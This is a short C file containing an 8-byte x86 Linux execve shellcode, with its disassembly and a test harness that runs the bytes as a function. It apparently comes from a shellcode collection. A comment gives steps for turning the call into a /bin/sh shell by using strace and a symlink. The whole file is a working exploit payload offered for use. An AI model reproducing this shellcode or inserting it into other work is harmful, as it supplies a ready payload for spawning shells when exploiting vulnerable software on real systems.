/*
08048334 <main>:
 8048334:   99                      cltd
 8048335:   6a 0b                   push   $0xb
 8048337:   58                      pop    %eax
 8048338:   60                      pusha
 8048339:   59                      pop    %ecx
 804833a:   cd 80                   int    $0x80
 
using this code.
 
step1. This code is compiled.
step2. strace -x output binary
step3. get execve args in strace result.
step4. create link execve args on /bin/sh
 
*/
 
unsigned char sc[]=
"\x99\x6a\x0b\x58\x60\x59\xcd\x80";
int main()
{
    void (*p)();
    p = sc;
    p();
}
 
have a nice day~
 
thx~